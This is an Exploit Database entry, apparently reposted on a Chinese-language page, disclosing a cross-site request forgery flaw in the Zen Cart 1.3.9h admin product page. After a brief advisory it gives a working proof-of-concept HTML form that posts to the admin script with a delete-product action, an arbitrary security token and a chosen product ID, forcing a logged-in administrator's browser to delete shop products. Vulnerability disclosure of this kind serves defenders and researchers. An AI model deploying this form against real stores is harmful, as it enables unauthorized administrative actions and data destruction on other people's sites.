Zen Cart 1.3.9h – ‘/path_to_admin/product.php’ Cross-Site Request Forgery

• Exploit Database
• 18 阅读

• 作者： DisK0nn3cT
  日期： 2012-02-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36688/

• source: https://www.securityfocus.com/bid/51968/info
  
  Zen Cart is prone to a cross-site request-forgery vulnerability.
  
  Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
  
  Zen Cart 1.3.9h is vulnerable; other versions may be affected.
  
  <form name="products" action="
  http://www.example.com/path_to_admin/product.php?action=delete_product_confirm";
  method="post">
  <label for="securityToken">Security Token</label><br/><input type="text"
  name="securityToken" value="Can be anything�" /><br/><br/>
  <label for="products_id">Products ID</label><br/><input type="text"
  name="products_id" value="329"><br/><br/>
  <label for="product_categories[]">Products Category</label><br/><input
  type="text" value="48" name="product_categories[]"><br/><br/>
  <input type="submit" border="0" alt="Delete" value=" Delete Product">
  </form>